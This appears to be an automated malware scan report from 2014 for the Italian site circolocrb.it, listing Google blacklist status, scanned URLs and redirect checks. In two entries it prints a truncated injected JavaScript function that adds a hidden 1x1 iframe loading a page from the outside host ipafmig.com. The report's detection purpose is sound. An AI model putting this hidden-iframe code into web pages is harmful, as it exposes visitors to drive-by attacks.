Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=circolocrb.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://circolocrb.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 21:04:19 GMT Location: http://www.circolocrb.it/ Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.circolocrb.it/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Aug 2014 21:04:19 GMT Location: ./home/?area=38 Server: Apache/2.4.10 (Unix) mod_fcgid/2.3.9 Content-Length: 0 Content-Type: text/html | clean |
http://www.circolocrb.it/./home/?area=38 | 200 OK Content-Length: 19973 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); Antivirus reports:
| ||
http://www.circolocrb.it/./home/./swfobject.js | 200 OK Content-Length: 8396 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var vvnh = document.createElement('iframe'); vvnh.src = 'http://ipafmig.com/count24.php'; vvnh.style.position = 'absolute'; vvnh.style.border = '0'; vvnh.style.height = '1px'; vvnh.style.width = '1px'; vvnh.style.left = '1px'; vvnh.style.top = '1px'; if (!document.getElementById('vvnh')) { document.write('<div id=\'vvnh\'></div>'); document.getElementById('vvnh').appendChild(vvnh); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v Antivirus reports:
| ||
http://circolocrb.it/js-global/FancyZoom.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 21:04:21 GMT Location: http://www.circolocrb.it/js-global/FancyZoom.js Server: Apache Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.circolocrb.it/js-global/fancyzoom.js | 404 Not Found Content-Length: 220 Content-Type: text/html | clean |
http://www.circolocrb.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://circolocrb.it/js-global/FancyZoomHTML.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 21:04:21 GMT Location: http://www.circolocrb.it/js-global/FancyZoomHTML.js Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.circolocrb.it/js-global/fancyzoomhtml.js | 404 Not Found Content-Length: 224 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: circolocrb.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 29 Aug 2014 21:04:19 GMT
Location: http://www.circolocrb.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
GET / HTTP/1.1
Host: circolocrb.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 29 Aug 2014 21:04:19 GMT
Location: http://www.circolocrb.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: circolocrb.it
Referer: http://www.google.com/search?q=circolocrb.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: circolocrb.it
Referer: http://www.google.com/search?q=circolocrb.it
Result:
The result is similar to the first query. There are no suspicious redirects found.